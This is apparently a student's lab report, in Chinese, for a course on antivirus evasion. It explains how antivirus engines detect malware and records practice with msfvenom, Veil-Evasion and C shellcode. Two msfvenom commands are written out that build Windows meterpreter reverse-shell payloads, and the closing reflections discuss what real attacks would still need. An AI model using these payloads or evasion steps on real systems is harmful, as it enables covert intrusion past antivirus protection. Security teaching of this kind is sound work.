20169218 2016-2017-2《免殺技術》第十四周學習總結

實踐內容

---

(1)理解免殺技術原理
(2)正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧；
（成功實現了免殺的。如何作成功的簡單語言描述便可，不要截圖、指令。與殺軟共生的結果驗證要截圖。）
(3)經過組合應用各類技術實現惡意代碼免殺
(4)用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

基礎問題回答

---

1.殺軟是如何檢測出惡意代碼的？
基於特徵碼的檢測：殺軟經過對已存在的流行代碼特徵的提取與比對檢測到具備該特徵碼的程序就看成檢測到了惡意代碼。
基於行爲的檢測：殺軟經過檢測程序是否有更改註冊表行爲、是否有設置自啓動、是否有修改權限等等。
2.免殺是作什麼？
經過一些手段來瞞過殺軟的檢測掃描，避免被殺毒軟件查殺，並能成功控制被植入機。
3.免殺的基本方法有哪些？
對惡意代碼進行加殼、用其餘語言或編譯器進行再編譯，利用shellcode進行編碼，減小對系統的修改，多在內存裏進行操做，多使用反彈式的鏈接。

實踐過程

---

本次實驗測試網址：http://www.virscan.org/

一、msfvenom直接生成meterpreter可執行文件並檢測：

使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.169 LPORT=5329 -f exe > 5329met-encoded.exe

而後將該程序上傳到virscan掃描：

2.用Veil-Evasion生成可執行文件

命令行直接輸入veil-evasion打開軟件，而後在menu裏輸入命令生成可執行文件：

上傳文件，檢測結果：

3.shellcode編程

在kali終端下生成一個c格式的十六進制數組，使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊者IP LPORT=302 -f c命令生成一個C語言shellcode數組。

實踐總結與體會

---

一、經過本次實驗，我瞭解了通常的殺毒軟件查殺的原理，通常的惡意代碼是如何想盡辦法假裝的；
二、咱們很容易的發現單單依賴查殺軟件或者防火牆是不會完美保護咱們的電腦主機的；
三、咱們要提升自身的安全保護意識和專業知識，才能下降咱們被惡意代碼侵害的風險。

離實戰還缺些什麼技術或步驟？

---

一、首先，靶機不會乖乖的讓咱們傳送目標文件，反彈式鏈接很重要，將惡意代碼融進用戶經常使用的應用程序能夠提升咱們的攻擊成功率，可是黑進主流的經常使用軟件程序內部是一件很難的事情；
二、其次，通常的殺毒軟件對主流的編碼、加殼的平臺程序都會有研究，直接使用這些平臺進行攻擊成功的概率極其小，咱們須要本身的手工的在惡意代碼中添加一些東西，這須要更加專業的知識，對各類系統更深的瞭解；
三、目前所作的實驗只侷限在同一網段，可是現實中的IP的變幻多端的，很複雜。